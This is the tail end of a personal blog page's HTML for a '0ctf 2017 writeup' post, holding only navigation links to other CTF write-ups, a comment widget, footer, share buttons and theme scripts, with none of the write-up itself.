    <a href="javascript:;" id="shareFab" class="page-share-fab waves-effect waves-circle">
        <i class="icon icon-share-alt icon-lg"></i>
    </a>
</div>



        </div>
    </div>

    
<nav class="post-nav flex-row flex-justify-between">
  
    <div class="waves-block waves-effect prev">
      <a href="/2017/05/05/BCTF-2017-babyuse/" id="post-prev" class="post-nav-link">
        <div class="tips"><i class="icon icon-angle-left icon-lg icon-pr"></i> Prev</div>
        <h4 class="title">BCTF 2017 babyuse</h4>
      </a>
    </div>
  

  
    <div class="waves-block waves-effect next">
      <a href="/2017/02/27/ZCTF-2017-write-up/" id="post-next" class="post-nav-link">
        <div class="tips">Next <i class="icon icon-angle-right icon-lg icon-pl"></i></div>
        <h4 class="title">ZCTF 2017 write up</h4>
      </a>
    </div>
  
</nav>



    







<section class="comments" id="comments">
    <!-- UY BEGIN -->
    <div id="uyan_frame"></div>
    <script src="http://v2.uyan.cc/code/uyan.js?uid=2132732"></script>
    <!-- UY END -->
</section>










</article>



</div>

        <footer class="footer">
    <div class="top">
        
<p>
    <span id="busuanzi_container_site_uv" style='display:none'>
        站点总访客数：<span id="busuanzi_value_site_uv"></span>
    </span>
    <span id="busuanzi_container_site_pv" style='display:none'>
        站点总访问量：<span id="busuanzi_value_site_pv"></span>
    </span>
</p>


        <p>
            
            <span>This blog is licensed under a <a rel="license" href="https://creativecommons.org/licenses/by/4.0/">Creative Commons Attribution 4.0 International License</a>.</span>
        </p>
    </div>
    <div class="bottom">
        <p>
            <span>Power by <a href="http://hexo.io/" target="_blank">Hexo</a> Theme <a href="https://github.com/yscoder/hexo-theme-indigo" target="_blank">indigo</a></span>
            <span>DazzleP &copy; 2016 - 2017</span>
        </p>
    </div>
</footer>

    </main>
    <div class="mask" id="mask"></div>
<a href="javascript:;" id="gotop" class="waves-effect waves-circle waves-light"><span class="icon icon-lg icon-chevron-up"></span></a>



<div class="global-share" id="globalShare">
    <ul class="reset share-icons">
      <li>
        <a class="weibo share-sns" target="_blank" href="http://service.weibo.com/share/share.php?url=http://blog.dazzlepppp.cn/2017/03/24/0ctf-2017-writeup/&title=《0ctf 2017 writeup》 — DazzleP's Blog&pic=http://blog.dazzlepppp.cn/img/avatar_maki.png" data-title="微博">
          <i class="icon icon-weibo"></i>
        </a>
      </li>
      <li>
        <a class="weixin share-sns wxFab" href="javascript:;" data-title="微信">
          <i class="icon icon-weixin"></i>
        </a>
      </li>
      <li>
        <a class="qq share-sns" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=http://blog.dazzlepppp.cn/2017/03/24/0ctf-2017-writeup/&title=《0ctf 2017 writeup》 — DazzleP's Blog&source=A poor bin dog from ROIS@FZU" data-title=" QQ">
          <i class="icon icon-qq"></i>
        </a>
      </li>
      <li>
        <a class="facebook share-sns" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=http://blog.dazzlepppp.cn/2017/03/24/0ctf-2017-writeup/" data-title=" Facebook">
          <i class="icon icon-facebook"></i>
        </a>
      </li>
      <li>
        <a class="twitter share-sns" target="_blank" href="https://twitter.com/intent/tweet?text=《0ctf 2017 writeup》 — DazzleP's Blog&url=http://blog.dazzlepppp.cn/2017/03/24/0ctf-2017-writeup/&via=http://blog.dazzlepppp.cn" data-title=" Twitter">
          <i class="icon icon-twitter"></i>
        </a>
      </li>
      <li>
        <a class="google share-sns" target="_blank" href="https://plus.google.com/share?url=http://blog.dazzlepppp.cn/2017/03/24/0ctf-2017-writeup/" data-title=" Google+">
          <i class="icon icon-google-plus"></i>
        </a>
      </li>
    </ul>
 </div>


<div class="page-modal wx-share" id="wxShare">
    <a class="close" href="javascript:;"><i class="icon icon-close"></i></a>
    <p>扫一扫，分享到微信</p>
    <img src="//api.qrserver.com/v1/create-qr-code/?data=http://blog.dazzlepppp.cn/2017/03/24/0ctf-2017-writeup/" alt="微信分享二维码">
</div>




    <script src="//cdn.bootcss.com/node-waves/0.7.4/waves.min.js"></script>
<script>
var BLOG = { ROOT: '/', SHARE: true, REWARD: false };



</script>

<script src="//unpkg.com/hexo-theme-material-indigo@latest/js/main.min.js"></script>


<div class="search-panel" id="search-panel">
    <ul class="search-result" id="search-result"></ul>
</div>
<template id="search-tpl">
<li class="item">
    <a href="{path}" class="waves-block waves-effect">
        <div class="title ellipsis" title="{title}">{title}</div>
        <div class="flex-row flex-middle">
            <div class="tags ellipsis">
                {tags}
            </div>
            <time class="flex-col time">{date}</time>
        </div>
    </a>
</li>
</template>

<script src="//unpkg.com/hexo-theme-material-indigo@latest/js/search.min.js" async></script>






<script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>





</body>
</html>
